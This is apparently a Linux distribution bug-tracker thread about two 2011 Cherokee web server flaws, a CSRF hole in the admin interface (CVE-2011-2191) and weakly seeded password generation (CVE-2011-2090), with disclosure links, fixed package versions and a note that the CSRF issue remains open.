Two flaws were reported in Cherokee. The first (CVE-2011-2191) is that the Cherokee server admin configuration web interface is vulnerable to CSRF. If an admin is logged into the Cherokee admin interface and visits a site which runs a malicious script, Cherokee can be reconfigured to execute arbitrary commands [1]. It is also vulnerable to use the CSRF to produce a persistant XSS [2]. The second (CVE-2011-2090) is that Cherokee seeds srand with a combination of the time and the PID of the admin process, after which rand() is called to generate a random password -- this is unsafe and allows for fairly easy local password guessing by a local user [3]. [1] http://seclists.org/fulldisclosure/2011/Jun/0 [2] http://www.openwall.com/lists/oss-security/2011/06/03/6 [3] http://code.google.com/p/cherokee/issues/detail?id=1212
Created cherokee tracking bugs for this issue Affects: fedora-all [bug 713306] Affects: epel-all [bug 713307]
Partial duplicate to 710471 (CVE-2011-2190)
Ahh, didn't see we had a bug for that already. Thanks!
This issue has been resolved via the following updates: 1) cherokee-1.2.101-1.fc15 for Fedora 15, 2) cherokee-1.2.101-1.fc14 for Fedora 14, 3) cherokee-1.2.101-1.el6 for Fedora EPEL 6, 4) cherokee-1.2.101-1.el5 for Fedora EPEL 5, 5) cherokee-1.2.101-1.el4 for Fedora EPEL 4. These updated packages have been pushed to -testing repository, and upon their required testing is complete, they will be pushed to -stable repository.
This bug consists of two separate issues. AFAICT, the second one has been dealt with, but the first one is still open. I am not really familiar with RedHat's workflow, but at least I have been unable to find anything fixing the CSRF bug, short of this mail sent by the upstream author, stating he has not found a way to solve it: http://www.openwall.com/lists/oss-security/2011/06/06/13